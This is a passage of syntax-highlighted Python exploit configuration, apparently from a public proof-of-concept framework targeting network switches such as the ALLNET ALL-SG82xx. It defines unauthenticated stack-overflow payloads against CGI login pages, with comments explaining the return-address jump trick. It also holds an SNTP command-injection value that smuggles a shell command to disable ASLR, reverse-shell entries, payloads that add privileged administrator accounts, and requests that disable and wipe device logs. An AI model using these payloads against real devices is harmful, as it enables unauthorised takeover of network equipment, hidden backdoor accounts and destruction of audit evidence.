					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'log'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Disable and clean logs'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'status'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token comment"># Verify lacking authentication</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
						<span class="token string">'security.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/security.cgi?login'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr=admin&amp;pswrd='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">280</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'datajson.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr=admin&amp;pswrd='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">288</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/sn_httpupload.cgi?'</span><span class="token punctuation">,</span> <span class="token comment"># Including alignment of opcodes in memory</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span> <span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'priv15_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Update running-config (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'add_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'del_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'del_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'SNTP command injection (PoC: disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>	<span class="token comment"># &lt;================================</span>
						<span class="token string">'enable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'enable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntpStatus=1&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSntp'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;srvDef=byIp&amp;sntpServer=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;cursntpPort=123&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'check_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;srvDef=byIp&amp;sntpServer=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;cursntpPort=123&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSntpDel'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_query'</span><span class="token punctuation">:</span><span class="token string">'{"":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntpStatus=0&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span> <span class="token comment"># It is vulnerable, but I am not using this authenticated code here :&gt;</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token comment">#</span>
					<span class="token comment"># The stack overflow in 'username' and 'password' at same request are multipurpose.</span>
					<span class="token comment">#</span>

					<span class="token comment">#</span>
					<span class="token comment"># The trick to jump and execute:</span>
					<span class="token comment"># 1. Code: username=[garbage][RA + 0x58000000]&amp;password=[garbage][NULL termination]</span>
					<span class="token comment"># 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary</span>
					<span class="token comment"># 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)</span>
					<span class="token comment"># 4. We will also feed required function parameters, by adding them to '_CMD_'</span>
					<span class="token comment">#</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: del priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>

						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>

					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable/Clean logs)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>

						<span class="token string">'log_settings_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;en=0'</span><span class="token punctuation">,</span>				<span class="token comment"># Disable Logging CMD</span>
						<span class="token string">'log_settings_set_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>			<span class="token comment"># Disable Logging SIGSEGV ?</span>

						<span class="token string">'log_ramClear_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;ta=0'</span><span class="token punctuation">,</span>					<span class="token comment"># Clean RAM CMD</span>
						<span class="token string">'log_ramClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean RAM SIGSEGV ?</span>

						<span class="token string">'log_fileClear_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;ta=1'</span><span class="token punctuation">,</span>				<span class="token comment"># Clean FILE log CMD</span>
						<span class="token string">'log_fileClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean FILE log SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntp_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sa=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;sp=123'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_check'</span><span class="token punctuation">:</span><span class="token string">'&amp;sa=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/conf_tmp/check`&amp;sp=123'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntpDel_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sa=+&amp;sp=123'</span><span class="token punctuation">,</span>				<span class="token comment"># CMD</span>

						<span class="token string">'sys_timeSettings_set_cmd_enable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sn=1'</span><span class="token punctuation">,</span>	<span class="token comment"># Enable CMD</span>
						<span class="token string">'sys_timeSettings_set_cmd_disable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sn=0'</span><span class="token punctuation">,</span>	<span class="token comment"># Disable CMD</span>
						<span class="token string">'sys_timeSettings_set_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/conf_tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token comment">#</span>
					<span class="token comment"># Used for both 'heap' and 'stack'</span>
					<span class="token comment">#</span>
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/security.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/security.cgi?logout'</span><span class="token punctuation">,</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'build=NOP&amp;heap=NOP&amp;to=NOP&amp;higher=addresses&amp;usr=admin&amp;pswrd=_PWDNOP_RA_START&amp;shellcode=_USRNOP_SHELLCODE'</span><span class="token punctuation">,</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span> <span class="token comment"># False = use Heap, and there are no ASLR</span>
						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>

				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token string">'ALLNET_JSON'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
				<span class="token string">'vendor'</span><span class="token punctuation">:</span> <span class="token string">'ALLNET GmbH Computersysteme'</span><span class="token punctuation">,</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'ALL-SG82xx'</span><span class="token punctuation">,</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.allnet.de/'</span><span class="token punctuation">,</span>
				<span class="token string">'modulus_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_login'</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_JSON'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_login'</span><span class="token punctuation">,</span>
				<span class="token string">'xsid'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'xsid_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_main'</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'rsa'</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username=USERNAME&amp;password=PASSWORD&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_loginStatus'</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_logout'</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'log'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Disable and clean logs'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=log_global'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;empty=1&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'status'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=log_global'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=log_clear'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;target=1&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=log_clear'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;target=0&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token comment"># Verify lacking authentication</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
						<span class="token string">'httpuploadruncfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/update "running-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/http_saverun_cfg'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'/var/config/running-config'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'/var/config/running-config'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httprestorecfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload "startup-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/httprestorecfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/startup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'/mnt/startup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'/mnt/startup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
